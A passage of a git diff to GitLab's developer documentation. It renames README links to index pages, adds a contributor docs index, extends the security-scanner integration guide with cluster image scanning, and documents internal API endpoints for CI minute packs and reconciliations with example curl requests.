`gitlab.com/gitlab-org/labkit/tracing` we can switch from using `Opentracing` directly to using `Zipkin` or Gokit's own tracing wrapper without changes to the application code, while still keeping the same -consistent configuration mechanism (i.e. the `GITLAB_TRACING` environment +consistent configuration mechanism (that is, the `GITLAB_TRACING` environment variable). ### Context @@ -436,8 +436,8 @@ and the version being used for [CNG](https://gitlab.com/gitlab-org/build/cng/blo ### Updating Go version -We should always use a [supported version](https://golang.org/doc/devel/release.html#policy) -of Go, i.e., one of the three most recent minor releases, and should always use +We should always use a [supported version](https://golang.org/doc/devel/release#policy) +of Go, that is, one of the three most recent minor releases, and should always use the most recent patch-level for that version, as it may contain security fixes. Changing the version affects every project being compiled, so it's important to @@ -507,4 +507,4 @@ If the scanner report is small, less than 35 lines, then feel free to [inline th --- -[Return to Development documentation](../README.md). +[Return to Development documentation](../index.md). diff --git a/doc/development/i18n/externalization.md b/doc/development/i18n/externalization.md index 7ea8378b6db..796a1f44ccd 100644 --- a/doc/development/i18n/externalization.md +++ b/doc/development/i18n/externalization.md @@ -363,7 +363,7 @@ use `%{created_at}` in Ruby but `%{createdAt}` in JavaScript. Make sure to // => When x == 2: 'Last 2 days' ``` -The `n_` method should only be used to fetch pluralized translations of the same +The `n_` and `n__` methods should only be used to fetch pluralized translations of the same string, not to control the logic of showing different strings for different quantities. Some languages have different quantities of target plural forms. For example, Chinese (simplified) has only one target plural form in our @@ -376,7 +376,7 @@ For example, use this: if selected_projects.one? selected_projects.first.name else - n__("Project selected", "%d projects selected", selected_projects.count) + n_("Project selected", "%d projects selected", selected_projects.count) end ``` diff --git a/doc/development/i18n/merging_translations.md b/doc/development/i18n/merging_translations.md index e3211f5a8fc..f89190fc316 100644 --- a/doc/development/i18n/merging_translations.md +++ b/doc/development/i18n/merging_translations.md @@ -21,7 +21,7 @@ message. This avoids an excessive number of pipelines from running. Before merging translations, make sure to trigger a pipeline to validate translations. Static analysis validates things CrowdIn doesn't do. Create a new pipeline at [`https://gitlab.com/gitlab-org/gitlab/pipelines/new`](https://gitlab.com/gitlab-org/gitlab/pipelines/new) -(need developer permissions) for the `master-i18n` branch. +(requires the Developer role) for the `master-i18n` branch. If there are validation errors, the easiest solution is to disapprove the offending string in CrowdIn, leaving a comment with what is diff --git a/doc/development/i18n/proofreader.md b/doc/development/i18n/proofreader.md index fc19ab93ecd..6e3b32e18df 100644 --- a/doc/development/i18n/proofreader.md +++ b/doc/development/i18n/proofreader.md @@ -93,6 +93,7 @@ are very appreciative of the work done by translators and proofreaders! - Portuguese, Brazilian - Paulo George Gomes Bezerra - [GitLab](https://gitlab.com/paulobezerra), [CrowdIn](https://crowdin.com/profile/paulogomes.rep) - André Gama - [GitLab](https://gitlab.com/andregamma), [CrowdIn](https://crowdin.com/profile/ToeOficial) + - Eduardo Addad de Oliveira - [GitLab](https://gitlab.com/eduardoaddad), [CrowdIn](https://crowdin.com/profile/eduardoaddad) - Romanian - Proofreaders needed. - Russian diff --git a/doc/development/img/stage_group_dashboards_error_attribution.png b/doc/development/img/stage_group_dashboards_error_attribution.png Binary files differnew file mode 100644 index 00000000000..bac778b7450 --- /dev/null +++ b/doc/development/img/stage_group_dashboards_error_attribution.png diff --git a/doc/development/img/stage_group_dashboards_service_sli_detail.png b/doc/development/img/stage_group_dashboards_service_sli_detail.png Binary files differnew file mode 100644 index 00000000000..5372b10074a --- /dev/null +++ b/doc/development/img/stage_group_dashboards_service_sli_detail.png diff --git a/doc/development/index.md b/doc/development/index.md new file mode 100644 index 00000000000..711fc009d23 --- /dev/null +++ b/doc/development/index.md @@ -0,0 +1,340 @@ +--- +comments: false +type: index, dev +stage: none +group: Development +info: "See the Technical Writers assigned to Development Guidelines: https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines" +description: "Development Guidelines: learn how to contribute to GitLab." +--- + +# Contributor and Development Docs + +Learn the processes and technical information needed for contributing to GitLab. + +This content is intended for members of the GitLab Team as well as community +contributors. Content specific to the GitLab Team should instead be included in +the [Handbook](https://about.gitlab.com/handbook/). + +For information on using GitLab to work on your own software projects, see the +[GitLab user documentation](../user/index.md). + +For information on working with the GitLab APIs, see the [API documentation](../api/README.md). + +For information about how to install, configure, update, and upgrade your own +GitLab instance, see the [administration documentation](../administration/index.md). + +## Get started + +- Set up the GitLab development environment with the + [GitLab Development Kit (GDK)](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/README.md) +- [GitLab contributing guide](contributing/index.md) + - [Issues workflow](contributing/issue_workflow.md) for more information about: + - Issue tracker guidelines. + - Triaging. + - Labels. + - Feature proposals. + - Issue weight. + - Regression issues. + - Technical or UX debt. + - [Merge requests workflow](contributing/merge_request_workflow.md) for more + information about: + - Merge request guidelines. + - Contribution acceptance criteria. + - Definition of done. + - Dependencies. + - [Style guides](contributing/style_guides.md) + - [Implement design & UI elements](contributing/design.md) +- [GitLab Architecture Overview](architecture.md) +- [Rake tasks](rake_tasks.md) for development + +## Processes + +**Must-reads:** + +- [Guide on adapting existing and introducing new components](architecture.md#adapting-existing-and-introducing-new-components) +- [Code review guidelines](code_review.md) for reviewing code and having code + reviewed +- [Database review guidelines](database_review.md) for reviewing + database-related changes and complex SQL queries, and having them reviewed +- [Secure coding guidelines](secure_coding_guidelines.md) +- [Pipelines for the GitLab project](pipelines.md) + +Complementary reads: + +- [GitLab core team & GitLab Inc. contribution process](https://gitlab.com/gitlab-org/gitlab/-/blob/master/PROCESS.md) +- [Security process for developers](https://gitlab.com/gitlab-org/release/docs/blob/master/general/security/developer.md#security-releases-critical-non-critical-as-a-developer) +- [Guidelines for implementing Enterprise Edition features](ee_features.md) +- [Danger bot](dangerbot.md) +- [Guidelines for changelogs](changelog.md) +- [Requesting access to ChatOps on GitLab.com](chatops_on_gitlabcom.md#requesting-access) (for GitLab team members) +- [Patch release process for developers](https://gitlab.com/gitlab-org/release/docs/blob/master/general/patch/process.md#process-for-developers) +- [Adding a new service component to GitLab](adding_service_component.md) + +### Development guidelines review + +When you submit a change to the GitLab development guidelines, who +you ask for reviews depends on the level of change. + +#### Wording, style, or link changes + +Not all changes require extensive review. For example, MRs that don't change the +content's meaning or function can be reviewed, approved, and merged by any +maintainer or Technical Writer. These can include: + +- Typo fixes. +- Clarifying links, such as to external programming language documentation. +- Changes to comply with the [Documentation Style Guide](documentation/index.md) + that don't change the intent of the documentation page. + +#### Specific changes + +If the MR proposes changes that are limited to a particular stage, group, or team, +request a review and approval from an experienced GitLab Team Member in that +group. For example, if you're documenting a new internal API used exclusively by +a given group, request an engineering review from one of the group's members. + +After the engineering review is complete, assign the MR to the +[Technical Writer associated with the stage and group](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments) +in the modified documentation page's metadata. + +If you have questions or need further input, request a review from the +Technical Writer assigned to the [Development Guidelines](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines). + +#### Broader changes + +Some changes affect more than one group. For example: + +- Changes to [code review guidelines](code_review.md). +- Changes to [commit message guidelines](contributing/merge_request_workflow.md#commit-messages-guidelines). +- Changes to guidelines in [feature flags in development of GitLab](feature_flags/). +- Changes to [feature flags documentation guidelines](documentation/feature_flags.md). + +In these cases, use the following workflow: + +1. Request a peer review from a member of your team. +1. Request a review and approval of an Engineering Manager (EM) + or Staff Engineer who's responsible for the area in question: + + - [Frontend](https://about.gitlab.com/handbook/engineering/frontend/) + - [Backend](https://about.gitlab.com/handbook/engineering/) + - [Database](https://about.gitlab.com/handbook/engineering/development/database/) + - [User Experience (UX)](https://about.gitlab.com/handbook/engineering/ux/) + - [Security](https://about.gitlab.com/handbook/engineering/security/) + - [Quality](https://about.gitlab.com/handbook/engineering/quality/) + - [Engineering Productivity](https://about.gitlab.com/handbook/engineering/quality/engineering-productivity-team/) + - [Infrastructure](https://about.gitlab.com/handbook/engineering/infrastructure/) + - [Technical Writing](https://about.gitlab.com/handbook/engineering/ux/technical-writing/) + + You can skip this step for MRs authored by EMs or Staff Engineers responsible + for their area. + + If there are several affected groups, you may need approvals at the + EM/Staff Engineer level from each affected area. + +1. After completing the reviews, consult with the EM/Staff Engineer + author / approver of the MR. + + If this is a significant change across multiple areas, request final review + and approval from the VP of Development, the DRI for Development Guidelines, + @clefelhocz1. + +1. After all approvals are complete, assign the merge request to the + Technical Writer for [Development Guidelines](https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments-to-development-guidelines) + for final content review and merge. The Technical Writer may ask for + additional approvals as previously suggested before merging the MR. + +### Reviewer values + +> [Introduced](https://gitlab.com/gitlab-org/gitlab/-/merge_requests/57293) in GitLab 14.1. + +As a reviewer or as a reviewee, make sure to familiarize yourself with +the [reviewer values](https://about.gitlab.com/handbook/engineering/workflow/reviewer-values/) we strive for at GitLab. + +## UX and Frontend guides + +- [GitLab Design System](https://design.gitlab.com/), for building GitLab with + existing CSS styles and elements +- [Frontend guidelines](fe_guide/index.md) +- [Emoji guide](fe_guide/emojis.md) + +## Backend guides + +### General + +- [Directory structure](directory_structure.md) +- [GitLab utilities](utilities.md) +- [Newlines style guide](newlines_styleguide.md) +- [Logging](logging.md) +- [Dealing with email/mailers](emails.md) +- [Kubernetes integration guidelines](kubernetes.md) +- [Permissions](permissions.md) +- [Code comments](code_comments.md) +- [Windows Development on GCP](windows.md) +- [FIPS compliance](fips_compliance.md) +- [`Gemfile` guidelines](gemfile.md) + +### Things to be aware of + +- [Gotchas](gotchas.md) to avoid +- [Avoid modules with instance variables](module_with_instance_variables.md), if + possible +- [Guidelines for reusing abstractions](reusing_abstractions.md) + +### Rails Framework related + +- [Routing](routing.md) +- [Rails initializers](rails_initializers.md) +- [Mass Inserting Models](mass_insert.md) +- [Issuable-like Rails models](issuable-like-models.md) +- [Issue types vs first-class types](issue_types.md) +- [DeclarativePolicy framework](policies.md) + +### Debugging + +- [Pry debugging](pry_debugging.md) +- [Sidekiq debugging](../administration/troubleshooting/sidekiq.md) + +### Git specifics + +- [How Git object deduplication works in GitLab](git_object_deduplication.md) +- [Git LFS](lfs.md) + +### API + +- [API style guide](api_styleguide.md) for contributing to the API +- [GraphQL API style guide](api_graphql_styleguide.md) for contributing to the + [GraphQL API](../api/graphql/index.md) + +### GitLab components and features + +- [Developing against interacting components or features](interacting_components.md) +- [Manage feature flags](feature_flags/index.md) +- [Licensed feature availability](licensed_feature_availability.md) +- [Accessing session data](session.md) +- [How to dump production data to staging](db_dump.md) +- [Geo development](geo.md) +- [Redis guidelines](redis.md) +- [Sidekiq guidelines](sidekiq_style_guide.md) for working with Sidekiq workers +- [Working with Gitaly](gitaly.md) +- [Elasticsearch integration docs](elasticsearch.md) +- [Working with Merge Request diffs](diffs.md) +- [Approval Rules](approval_rules.md) +- [Repository mirroring](repository_mirroring.md) +- [File uploads](uploads.md) +- [Auto DevOps development guide](auto_devops.md) +- [Renaming features](renaming_features.md) +- [Code Intelligence](code_intelligence/index.md) +- [Feature categorization](feature_categorization/index.md) +- [Wikis development guide](wikis.md) +- [Image scaling guide](image_scaling.md) +- [Cascading Settings](cascading_settings.md) +- [Shell commands](shell_commands.md) in the GitLab codebase +- [Value Stream Analytics development guide](value_stream_analytics.md) +- [Application limits](application_limits.md) + +### Import/Export + +- [Working with the GitHub importer](github_importer.md) +- [Import/Export development documentation](import_export.md) +- [Test Import Project](import_project.md) +- [Group migration](bulk_import.md) +- [Export to CSV](export_csv.md) + +## Language-specific guides + +### Go guides + +- [Go Guidelines](go_guide/index.md) + +### Shell Scripting guides + +- [Shell scripting standards and style guidelines](shell_scripting_guide/index.md) + +## Performance guides + +- [Instrumentation](instrumentation.md) for Ruby code running in production + environments. +- [Performance guidelines](performance.md) for writing code, benchmarks, and + certain patterns to avoid. +- [Merge request performance guidelines](merge_request_performance_guidelines.md) + for ensuring merge requests do not negatively impact GitLab performance +- [Profiling](profiling.md) a URL, measuring performance using Sherlock, or + tracking down N+1 queries using Bullet. +- [Cached queries guidelines](cached_queries.md), for tracking down N+1 queries + masked by query caching, memory profiling and why should we avoid cached + queries. + +## Database guides + +See [database guidelines](database/index.md). + +## Integration guides + +- [Jira Connect app](integrations/jira_connect.md) +- [Security Scanners](integrations/secure.md) +- [Secure Partner Integration](integrations/secure_partner_integration.md) +- [How to run Jenkins in development environment](integrations/jenkins.md) +- [How to run local `Codesandbox` integration for Web IDE Live Preview](integrations/codesandbox.md) + +## Testing guides + +- [Testing standards and style guidelines](testing_guide/index.md) +- [Frontend testing standards and style guidelines](testing_guide/frontend_testing.md) + +## Refactoring guides + +- [Refactoring guidelines](refactoring_guide/index.md) + +## Deprecation guides + +- [Deprecation guidelines](deprecation_guidelines/index.md) + +## Documentation guides + +- [Writing documentation](documentation/index.md) +- [Documentation style guide](documentation/styleguide/index.md) +- [Markdown](../user/markdown.md) + +## Internationalization (i18n) guides + +- [Introduction](i18n/index.md) +- [Externalization](i18n/externalization.md) +- [Translation](i18n/translation.md) + +## Product Intelligence guides + +- [Product Intelligence guide](https://about.gitlab.com/handbook/product/product-intelligence-guide/) +- [Service Ping guide](service_ping/index.md) +- [Snowplow guide](snowplow/index.md) + +## Experiment guide + +- [Introduction](experiment_guide/index.md) + +## Build guides + +- [Building a package for testing purposes](build_test_package.md) + +## Compliance + +- [Licensing](licensing.md) for ensuring license compliance + +## Domain-specific guides + +- [CI/CD development documentation](cicd/index.md) +- [AppSec development documentation](appsec/index.md) + +## Other Development guides + +- [Defining relations between files using projections](projections.md) +- [Reference processing](reference_processing.md) +- [Compatibility with multiple versions of the application running at the same time](multi_version_compatibility.md) +- [Features inside `.gitlab/`](features_inside_dot_gitlab.md) +- [Dashboards for stage groups](stage_group_dashboards.md) +- [Preventing transient bugs](transient/prevention-patterns.md) + +## Other GitLab Development Kit (GDK) guides + +- [Run full Auto DevOps cycle in a GDK instance](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/main/doc/howto/auto_devops.md) +- [Using GitLab Runner with the GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/blob/main/doc/howto/runner.md) +- [Using the Web IDE terminal with the GDK](https://gitlab.com/gitlab-org/gitlab-development-kit/-/blob/main/doc/howto/web_ide_terminal_gdk_setup.md) diff --git a/doc/development/integrations/secure.md b/doc/development/integrations/secure.md index c4d8dfd3b95..07f7ac6a2ac 100644 --- a/doc/development/integrations/secure.md +++ b/doc/development/integrations/secure.md @@ -7,7 +7,7 @@ info: To determine the technical writer assigned to the Stage/Group associated w # Security scanner integration Integrating a security scanner into GitLab consists of providing end users -with a [CI job definition](../../ci/yaml/README.md) +with a [CI job definition](../../ci/yaml/index.md) they can add to their CI configuration files to scan their GitLab projects. This CI job should then output its results in a GitLab-specified format. These results are then automatically presented in various places in GitLab, such as the Pipeline view, Merge Request @@ -23,53 +23,67 @@ scanner, as well as requirements and guidelines for the Docker image. This section describes several important fields to add to the security scanner's job definition file. Full documentation on these and other available fields can be viewed -in the [CI documentation](../../ci/yaml/README.md#image). +in the [CI documentation](../../ci/yaml/index.md#image). ### Name For consistency, scanning jobs should be named after the scanner, in lower case. The job name is suffixed after the type of scanning: -`_dependency_scanning`, `_container_scanning`, `_dast`, and `_sast`. + +- `_dependency_scanning` +- `_cluster_image_scanning` +- `_container_scanning` +- `_dast` +- `_sast` + For instance, the dependency scanning job based on the "MySec" scanner would be named `mysec_dependency_scanning`. ### Image -The [`image`](../../ci/yaml/README.md#image) keyword is used to specify +The [`image`](../../ci/yaml/index.md#image) keyword is used to specify the [Docker image](../../ci/docker/using_docker_images.md#what-is-an-image) containing the security scanner. ### Script -The [`script`](../../ci/yaml/README.md#script) keyword +The [`script`](../../ci/yaml/index.md#script) keyword is used to specify the commands to run the scanner. Because the `script` entry can't be left empty, it must be set to the command that performs the scan. It is not possible to rely on the predefined `ENTRYPOINT` and `CMD` of the Docker image to perform the scan automatically, without passing any command. -The [`before_script`](../../ci/yaml/README.md#before_script) +The [`before_script`](../../ci/yaml/index.md#before_script) should not be used in the job definition because users may rely on this to prepare their projects before performing the scan. For instance, it is common practice to use `before_script` to install system libraries a particular project needs before performing SAST or Dependency Scanning. -Similarly, [`after_script`](../../ci/yaml/README.md#after_script) +Similarly, [`after_script`](../../ci/yaml/index.md#after_script) should not be used in the job definition, because it may be overridden by users. ### Stage For consistency, scanning jobs should belong to the `test` stage when possible. -The [`stage`](../../ci/yaml/README.md#stage) keyword can be omitted because `test` is the default value. +The [`stage`](../../ci/yaml/index.md#stage) keyword can be omitted because `test` is the default value. ### Fail-safe To be aligned with the [GitLab Security paradigm](https://about.gitlab.com/direction/secure/#security-paradigm), scanning jobs should not block the pipeline when they fail, -so the [`allow_failure`](../../ci/yaml/README.md#allow_failure) parameter should be set to `true`. +so the [`allow_failure`](../../ci/yaml/index.md#allow_failure) parameter should be set to `true`. ### Artifacts Scanning jobs must declare a report that corresponds to the type of scanning they perform, -using the [`artifacts:reports`](../../ci/yaml/README.md#artifactsreports) keyword. -Valid reports are: `dependency_scanning`, `container_scanning`, `dast`, `api_fuzzing`, `coverage_fuzzing`, and `sast`. +using the [`artifacts:reports`](../../ci/yaml/index.md#artifactsreports) keyword. +Valid reports are: + +- `dependency_scanning` +- `container_scanning` +- `cluster_image_scanning` +- `dast` +- `api_fuzzing` +- `coverage_fuzzing` +- `sast` For example, here is the definition of a SAST job that generates a file named `gl-sast-report.json`, and uploads it as a SAST report: @@ -90,9 +104,15 @@ it's declared under the `reports:sast` key in the job definition, not because of Certain GitLab workflows, such as [AutoDevOps](../../topics/autodevops/customize.md#disable-jobs), define CI/CD variables to indicate that given scans should be disabled. You can check for this by looking -for variables such as `DEPENDENCY_SCANNING_DISABLED`, `CONTAINER_SCANNING_DISABLED`, -`SAST_DISABLED`, and `DAST_DISABLED`. If appropriate based on the scanner type, you should then -disable running the custom scanner. +for variables such as: + +- `DEPENDENCY_SCANNING_DISABLED` +- `CONTAINER_SCANNING_DISABLED` +- `CLUSTER_IMAGE_SCANNING_DISABLED` +- `SAST_DISABLED` +- `DAST_DISABLED` + +If appropriate based on the scanner type, you should then disable running the custom scanner. GitLab also defines a `CI_PROJECT_REPOSITORY_LANGUAGES` variable, which provides the list of languages in the repository. Depending on this value, your scanner may or may not do something different. @@ -171,7 +191,7 @@ It also generates text output on the standard output and standard error streams, ### Variables All CI/CD variables are passed to the scanner as environment variables. -The scanned project is described by the [predefined CI/CD variables](../../ci/variables/README.md). +The scanned project is described by the [predefined CI/CD variables](../../ci/variables/index.md). #### SAST and Dependency Scanning @@ -194,6 +214,19 @@ using the variables `DOCKER_USER` and `DOCKER_PASSWORD`. If these are not defined, then the scanner should use `CI_REGISTRY_USER` and `CI_REGISTRY_PASSWORD` as default values. +#### Cluster Image Scanning + +To be consistent with the official `cluster_image_scanning` for GitLab, scanners must scan the +Kubernetes cluster whose configuration is given by `KUBECONFIG`. + +If you use the `CIS_KUBECONFIG` CI/CD variable, then the +`KUBECONFIG` variable is ignored and the cluster specified in the +`CIS_KUBECONFIG` variable is scanned instead. If you don't provide +the `CIS_KUBECONFIG` CI/CD variable, the value defaults to the value of +`$KUBECONFIG`. `$KUBECONFIG` is a predefined CI/CD variable configured when the project is assigned to a +Kubernetes cluster. When multiple contexts are provided in the `KUBECONFIG` variable, the context +selected as `current-context` will be used to fetch vulnerabilities. + #### Configuration files While scanners may use `CI_PROJECT_DIR` to load specific configuration files, @@ -209,7 +242,7 @@ It is recommended to name the output file after the type of scanning, and to use Since all Secure reports are JSON files, it is recommended to use `.json` as a file extension. For instance, a suggested filename for a Dependency Scanning report is `gl-dependency-scanning.json`. -The [`artifacts:reports`](../../ci/yaml/README.md#artifactsreports) keyword +The [`artifacts:reports`](../../ci/yaml/index.md#artifactsreports) keyword of the job definition must be consistent with the file path where the Security report is written. For instance, if a Dependency Scanning analyzer writes its report to the CI project directory, and if this report filename is `depscan.json`, @@ -282,7 +315,8 @@ The format is extensively described in the documentation of [SAST](../../user/application_security/sast/index.md#reports-json-format), [DAST](../../user/application_security/dast/#reports), [Dependency Scanning](../../user/application_security/dependency_scanning/index.md#reports-json-format), -and [Container Scanning](../../user/application_security/container_scanning/index.md#reports-json-format). +[Container Scanning](../../user/application_security/container_scanning/index.md#reports-json-format), +and [Cluster Image Scanning](../../user/application_security/cluster_image_scanning/index.md#reports-json-format). You can find the schemas for these scanners here: @@ -310,7 +344,12 @@ We recommend that you generate a UUID and use it as the `id` field's value. #### Category The value of the `category` field matches the report type: -`dependency_scanning`, `container_scanning`, `sast`, and `dast`. + +- `dependency_scanning` +- `cluster_image_scanning` +- `container_scanning` +- `sast` +- `dast` #### Scanner @@ -415,6 +454,10 @@ which is used to track vulnerabilities as new commits are pushed to the repository. The attributes used to generate the location fingerprint also depend on the type of scanning. +### Details + +The `details` field is an object that supports many different content elements that are displayed when viewing vulnerability information. An example of the various data elements can be seen in the [security-reports repository](https://gitlab.com/gitlab-examples/security/security-reports/-/tree/master/samples/details-example). + #### Dependency Scanning The `location` of a Dependency Scanning vulnerability is composed of a `dependency` and a `file`. @@ -476,6 +519,31 @@ so these attributes are mandatory. The `image` is also mandatory. All other attributes are optional. +#### Cluster Image Scanning + +The `location` of a `cluster_image_scanning` vulnerability has a `dependency` field. It also has +an `operating_system` field. For example, here is the `location` object for a vulnerability +affecting version `2.50.3-2+deb9u1` of Debian package `glib2.0`: + +```json +{ + "dependency": { + "package": { + "name": "glib2.0" + }, + }, + "version": "2.50.3-2+deb9u1", + "operating_system": "debian:9", + "image": "index.docker.io/library/nginx:1.18" +} +``` + +The affected package is found when scanning the image of the pod `index.docker.io/library/nginx:1.18`. + +The location fingerprint of a Cluster Image Scanning vulnerability combines the +`operating_system` and the package `name`, so these attributes are mandatory. The `image` is also +mandatory. All other attributes are optional. + #### SAST The `location` of a SAST vulnerability must have a `file` and a `start_line` field, diff --git a/doc/development/integrations/secure_partner_integration.md b/doc/development/integrations/secure_partner_integration.md index e6048bed152..34e0aaedfaf 100644 --- a/doc/development/integrations/secure_partner_integration.md +++ b/doc/development/integrations/secure_partner_integration.md @@ -83,13 +83,14 @@ and complete an integration with the Secure stage. 1. Ensure your pipeline jobs create a report artifact that GitLab can process to successfully display your own product's results with the rest of GitLab. - See detailed [technical directions](secure.md) for this step. - - Read more about [job report artifacts](../../ci/yaml/README.md#artifactsreports). + - Read more about [job report artifacts](../../ci/yaml/index.md#artifactsreports). - Read about [job artifacts](../../ci/pipelines/job_artifacts.md). - Your report artifact must be in one of our currently supported formats. For more information, see the [documentation on reports](secure.md#report). - Documentation for [SAST reports](../../user/application_security/sast/index.md#reports-json-format). - Documentation for [Dependency Scanning reports](../../user/application_security/dependency_scanning/index.md#reports-json-format). - Documentation for [Container Scanning reports](../../user/application_security/container_scanning/index.md#reports-json-format). + - Documentation for [`cluster_image_scanning` reports](../../user/application_security/cluster_image_scanning/index.md#reports-json-format). - See this [example secure job definition that also defines the artifact created](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/Security/Container-Scanning.gitlab-ci.yml). - If you need a new kind of scan or report, [create an issue](https://gitlab.com/gitlab-org/gitlab/-/issues/new#) and add the label `devops::secure`. diff --git a/doc/development/internal_api.md b/doc/development/internal_api.md index 95139f731e1..4614db96263 100644 --- a/doc/development/internal_api.md +++ b/doc/development/internal_api.md @@ -445,7 +445,7 @@ agent to be authorized is [not yet implemented](https://gitlab.com/gitlab-org/gi | Attribute | Type | Required | Description | |:----------|:-------|:---------|:------------| -| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../api/README.md#namespaced-path-encoding) | +| `id` | integer/string | yes | The ID or [URL-encoded path of the project](../api/index.md#namespaced-path-encoding) | ```plaintext GET /internal/kubernetes/project_info @@ -529,7 +529,7 @@ POST /namespaces/:id/gitlab_subscription Example request: ```shell -curl --request POST --header "TOKEN: <admin_access_token>" "https://gitlab.com/api/v4/namespaces/1234/gitlab_subscription?start_date="2020-07-15"&plan="silver"&seats=10" +curl --request POST --header "TOKEN: <admin_access_token>" "https://gitlab.com/api/v4/namespaces/1234/gitlab_subscription?start_date="2020-07-15"&plan="premium"&seats=10" ``` Example response: @@ -537,8 +537,8 @@ Example response: ```json { "plan": { - "code":"silver", - "name":"Silver", + "code":"premium", + "name":"premium", "trial":false, "auto_renew":null, "upgradable":false @@ -588,8 +588,8 @@ Example response: ```json { "plan": { - "code":"silver", - "name":"Silver", + "code":"premium", + "name":"premium", "trial":false, "auto_renew":null, "upgradable":false @@ -627,8 +627,8 @@ Example response: ```json { "plan": { - "code":"silver", - "name":"Silver", + "code":"premium", + "name":"premium", "trial":false, "auto_renew":null, "upgradable":false @@ -650,3 +650,122 @@ Example response: ### Known consumers - CustomersDot + +## CI minute provisioning + +The CI Minute endpoints are used by [CustomersDot](https://gitlab.com/gitlab-org/customers-gitlab-com) (`customers.gitlab.com`) +to apply additional packs of CI minutes, for personal namespaces or top-level groups within GitLab.com. + +### Creating an additional pack + +Use a POST to create an additional pack. + +```plaintext +POST /namespaces/:id/minutes +``` + +| Attribute | Type | Required | Description | +|:------------|:--------|:---------|:------------| +| `expires_at` | date | yes | Expiry date of the purchased pack| +| `number_of_minutes` | integer | yes | Number of additional minutes | +| `purchase_xid` | string | yes | The unique ID of the purchase | + +Example request: + +```shell +curl --request POST \ + --url http://localhost:3000/api/v4/namespaces/123/minutes \ + --header 'Content-Type: application/json' \ + --header 'PRIVATE-TOKEN: <admin access token>' \ + --data '{ + "number_of_minutes": 10000, + "expires_at": "2022-01-01", + "purchase_xid": "46952fe69bebc1a4de10b2b4ff439d0c" }' +``` + +Example response: + +```json +{ + "namespace_id": 123, + "expires_at": "2022-01-01", + "number_of_minutes": 10000, + "purchase_xid": "46952fe69bebc1a4de10b2b4ff439d0c" +} +``` + +### Moving additional packs + +Use a PATCH to move additional packs from one namespace to another. + +```plaintext +PATCH /namespaces/:id/minutes/move/:target_id +``` + +| Attribute | Type | Required | Description | +|:------------|:--------|:---------|:------------| +| `id` | string | yes | The ID of the namespace to transfer packs from | +| `target_id` | string | yes | The ID of the target namespace to transfer the packs to | + +Example request: + +```shell +curl --request PATCH \ + --url http://localhost:3000/api/v4/namespaces/123/minutes/move/321 \ + --header 'PRIVATE-TOKEN: <admin access token>' +``` + +Example response: + +```json +{ + "message": "202 Accepted" +} +``` + +### Known consumers + +- CustomersDot + +## Upcoming reconciliations + +The `upcoming_reconciliations` endpoint is used by [CustomersDot](https://gitlab.com/gitlab-org/customers-gitlab-com) (`customers.gitlab.com`) +to update upcoming reconciliations for namespaces. + +### Updating `upcoming_reconciliations` + +Use a PUT command to update `upcoming_reconciliations`. + +```plaintext +PUT /internal/upcoming_reconciliations +``` + +| Attribute | Type | Required | Description | +|:-------------------|:-----------|:---------|:------------| +| `upcoming_reconciliations` | array | yes | Array of upcoming reconciliations | + +Each array element contains: + +| Attribute | Type | Required | Description | +|:-------------------|:-----------|:---------|:------------| +| `namespace_id` | integer | yes | ID of the namespace to be reconciled | +| `next_reconciliation_date` | date | yes | Date when next reconciliation will happen | +| `display_alert_from` | date | yes | Start date to display alert of upcoming reconciliation | + +Example request: + +```shell +curl --request PUT --header "PRIVATE-TOKEN: <admin_access_token>" --header "Content-Type: application/json" \ + --data '{"upcoming_reconciliations": [{"namespace_id": 127, "next_reconciliation_date": "13 Jun 2021", "display_alert_from": "06 Jun 2021"}, {"namespace_id": 129, "next_reconciliation_date": "12 Jun 2021", "display_alert_from": "05 Jun 2021"}]}' \ + "https://gitlab.com/api/v4/internal/upcoming_reconciliations" +``` + +Example response: + +```plaintext +200 +``` + +### Known consumers + +- CustomersDot diff --git a/doc/development/iterating_tables_in_batches.md b/doc/development/iterating_tables_in_batches.md index bae55bccf7c..3f2b467fec9 100644 --- a/doc/development/iterating_tables_in_batches.md +++ b/doc/development/iterating_tables_in_batches.md @@ -4,7 +4,7 @@ group: Database info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://about.gitlab.com/handbook/engineering/ux/technical-writing/#assignments --- -# Iterating Tables In Batches +# Iterating tables in batches Rails provides a method called `in_batches` that can be used to iterate over rows in batches. For example: @@ -15,7 +15,7 @@ User.in_batches(of: 10) do |relation| end ``` -Unfortunately this method is implemented in a way that is not very efficient, +Unfortunately, this method is implemented in a way that is not very efficient, both query and memory usage wise. To work around this you can include the `EachBatch` module into your models, @@ -44,17 +44,18 @@ all of the arguments that `in_batches` supports. You should always use ## Avoid iterating over non-unique columns -One should proceed with extra caution, and possibly avoid iterating over a column that can contain duplicate values. -When you iterate over an attribute that is not unique, even with the applied max batch size, there is no guarantee that the resulting batches will not surpass it. -The following snippet demonstrates this situation, when one attempt to select `Ci::Build` entries for users with `id` between `1` and `10,s000`, database returns `1 215 178` -matching rows +One should proceed with extra caution, and possibly avoid iterating over a column that can contain +duplicate values. When you iterate over an attribute that is not unique, even with the applied max +batch size, there is no guarantee that the resulting batches will not surpass it. The following +snippet demonstrates this situation when one attempt to select `Ci::Build` entries for users with +`id` between `1` and `10,000`, the database returns `1 215 178` matching rows. ```ruby [ gstg ] production> Ci::Build.where(user_id: (1..10_000)).size => 1215178 ``` -This happens because built relation is translated into following query +This happens because built relation is translated into the following query ```ruby [ gstg ] production> puts Ci::Build.where(user_id: (1..10_000)).to_sql @@ -62,12 +63,16 @@ SELECT "ci_builds".* FROM "ci_builds" WHERE "ci_builds"."type" = 'Ci::Build' AND => nil ``` -And queries which filters non-unique column by range `WHERE "ci_builds"."user_id" BETWEEN ? AND ?`, even though the range size is limited to certain threshold (`10,000` in previous example) this threshold does not translates to the size of returned dataset. That happens because when taking `n` possible values of attributes, -one can't tell for sure that the number of records that contains them will be less than `n`. +`And` queries which filter non-unique column by range `WHERE "ci_builds"."user_id" BETWEEN ? AND ?`, +even though the range size is limited to a certain threshold (`10,000` in the previous example) this +threshold does not translate 